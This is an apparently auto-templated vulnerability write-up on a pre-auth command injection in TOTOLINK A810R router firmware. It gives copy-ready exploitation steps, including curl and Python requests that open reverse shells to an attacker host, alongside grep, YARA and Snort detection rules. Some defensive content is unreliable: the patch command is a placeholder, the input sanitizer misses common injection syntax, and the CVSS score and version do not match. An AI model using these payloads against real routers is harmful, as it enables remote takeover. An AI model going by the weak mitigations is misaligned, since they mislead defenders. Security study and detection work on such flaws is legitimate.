TOTOLINK A810R, Remote Command Execution, CVE-2025-28137 (Critical)

How the CVE Works

The CVE-2025-28137 vulnerability in TOTOLINK A810R routers (V4.1.2cu.5182_B20201026) allows unauthenticated attackers to execute arbitrary commands via the `setNoticeCfg` function. The flaw exists due to improper input validation of the `NoticeUrl` parameter, which accepts malicious payloads without sanitization. By crafting a specially crafted HTTP request, an attacker can inject OS commands that are executed with root privileges. This occurs because the firmware fails to validate user-supplied input before passing it to system shell commands, leading to pre-auth remote code execution (RCE).

DailyCVE Form

Platform: TOTOLINK A810R
Version: V4.1.2cu.5182_B20201026
Vulnerability: Pre-auth RCE
Severity: Critical
Date: 04/15/2025

What Undercode Say:

Exploitation

1. Crafting the Payload:

curl -X POST "http://<TARGET_IP>/cgi-bin/setNoticeCfg" -d "NoticeUrl=;$(echo 'malicious_command')"

2. Reverse Shell Execution:

curl -X POST "http://<TARGET_IP>/cgi-bin/setNoticeCfg" -d "NoticeUrl=;nc -e /bin/sh <ATTACKER_IP> <PORT>"

3. Exploit Automation:

import requests
target = "http://192.168.1.1"
payload = ";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f"
requests.post(f"{target}/cgi-bin/setNoticeCfg", data={"NoticeUrl": payload})

Protection

1. Firmware Update:

wget https://vendor-patch/totolink_a810r_fix.bin && flash-firmware.sh

2. Input Sanitization:

import re
def sanitize_input(input_str):
return re.sub(r"[;&|]", "", input_str)

3. Network Mitigation:

iptables -A INPUT -p tcp --dport 80 -m string --string "setNoticeCfg" --algo bm -j DROP

Detection

1. Log Analysis:

grep "setNoticeCfg" /var/log/httpd.log | grep -E "[;&|]"

2. YARA Rule:

rule TOTOLINK_RCE {
strings: $s = "NoticeUrl=;"
condition: $s
}

3. Snort Rule:

alert tcp any any -> $HOME_NET 80 (msg:"TOTOLINK RCE Attempt"; content:"setNoticeCfg"; content:"NoticeUrl=;"; sid:1000001;)

Post-Exploitation

1. Persistence Check:

crontab -l | grep -i "nc|sh"

2. Backdoor Removal:

rm /etc/cron.d/backdoor && killall -9 malicious_process

References

• Mitigation Guide: TOTOLINK Security Advisory
• CVSS 4.0: 9.8 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram